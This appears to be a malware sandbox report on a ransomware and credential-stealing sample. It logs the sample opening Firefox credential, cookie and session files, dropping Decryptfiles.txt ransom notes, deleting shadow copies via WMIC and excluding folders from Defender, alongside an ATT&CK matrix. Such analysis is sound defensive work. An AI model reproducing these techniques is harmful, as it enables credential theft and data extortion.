Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal.JKrvJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal.dqFEJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal.AcVpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed\Decryptfiles.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal.HEnpJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\targeting.snapshot.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\targeting.snapshot.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-wal.DlBYJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\xulstore.json.SfxeJump to behavior

Stealing of Sensitive Information

barindex
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\times.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\search.json.mozlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\75265401-2d75-4127-a70f-7d6e61df69a0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832120.4cb4db2a-ee68-4128-8ff4-f04bdc710c24.event.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\containers.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ExperimentStoreData.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832118.b6281059-34c6-49d8-97c7-24de33b104ab.new-profile.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\3eb2db8e-f770-4c52-9d7b-27180bea4925Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\previous.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\8940dc38-b85f-4355-b090-8e4e300a9627Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\xulstore.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832123.3eb2db8e-f770-4c52-9d7b-27180bea4925.main.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\eventsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\SiteSecurityServiceState.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\d3698c60-da91-4f8c-b7c7-e14b40be8bb1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838415.86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca.main.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b38522d7-1787-4855-a312-c27916e30610Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\background-updateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\data.safe.binJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838393.b7b7301e-d32e-49f7-b138-9fd21cf2ca6b.health.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6281059-34c6-49d8-97c7-24de33b104abJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838410.75265401-2d75-4127-a70f-7d6e61df69a0.health.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b3e287d1-bcec-4242-9158-4e1296363490Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\7e03a685-c52e-4810-b494-0f433b33ac49Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\compatibility.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\parent.lockJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addonStartup.json.lz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Crash Reports\InstallTime20230927232528.QuJO.kEei.gKvP.secXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\handlers.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\times.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\dd74a7e7-e73b-4ab9-8964-ca5c53c60966Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6dd686f-a071-4a96-9ec4-4a8ffdac9d0cJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838409.7e03a685-c52e-4810-b494-0f433b33ac49.event.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\targeting.snapshot.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\shield-preference-experiments.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extension-preferences.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\state.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b7b7301e-d32e-49f7-b138-9fd21cf2ca6bJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\pkcs11.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\4db4139f-6dcf-40ae-89c1-1ca4ca5a35edJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\session-state.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\.metadata-v2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-shmJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\Application Data\Mozilla\Firefox\Crash Reports\InstallTime20230927232528.QuJOJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addons.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\86928e7f-6ba2-4b62-8ea8-d89cfd7a97caJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832124.b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c.first-shutdown.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqliteJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\AlternateServices.txtJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\4cb4db2a-ee68-4128-8ff4-f04bdc710c24Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.jsonJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-walJump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore.jsonlz4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\t5y6t5.exeFile opened: C:\Documents and Settings\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
PowerShell
1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
1
OS Credential Dumping
3
File and Directory Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault AccountsScheduled Task/Job11
Registry Run Keys / Startup Folder
11
Process Injection
1
DLL Side-Loading
LSASS Memory11
System Information Discovery
Remote Desktop Protocol1
Browser Session Hijacking
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
Registry Run Keys / Startup Folder
1
File Deletion
Security Account Manager111
Security Software Discovery
SMB/Windows Admin Shares1
Data from Local System
2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Masquerading
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Modify Registry
LSA Secrets31
Virtualization/Sandbox Evasion
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
Virtualization/Sandbox Evasion
Cached Domain Credentials1
Application Window Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
Process Injection
DCSync1
Remote System Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Rundll32
Proc Filesystem1
System Network Configuration Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568876 Sample: R7bv9d6gTH.dll Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 107 fiatie.top 2->107 111 Antivirus detection for URL or domain 2->111 113 Multi AV Scanner detection for submitted file 2->113 115 Sigma detected: Delete shadow copy via WMIC 2->115 117 6 other signatures 2->117 11 loaddll32.exe 1 2->11         started        14 t5y6t5.exe 2->14         started        16 t5y6t5.exe 2->16         started        18 notepad.exe 2->18         started        signatures3 process4 signatures5 137 Adds a directory exclusion to Windows Defender 11->137 20 cmd.exe 1 11->20         started        23 cmd.exe 1 11->23         started        25 cmd.exe 1 11->25         started        35 2 other processes 11->35 139 Deletes shadow drive data (may be related to ransomware) 14->139 27 cmd.exe 14->27         started        29 WMIC.exe 14->29         started        31 WMIC.exe 14->31         started        33 cmd.exe 16->33         started        37 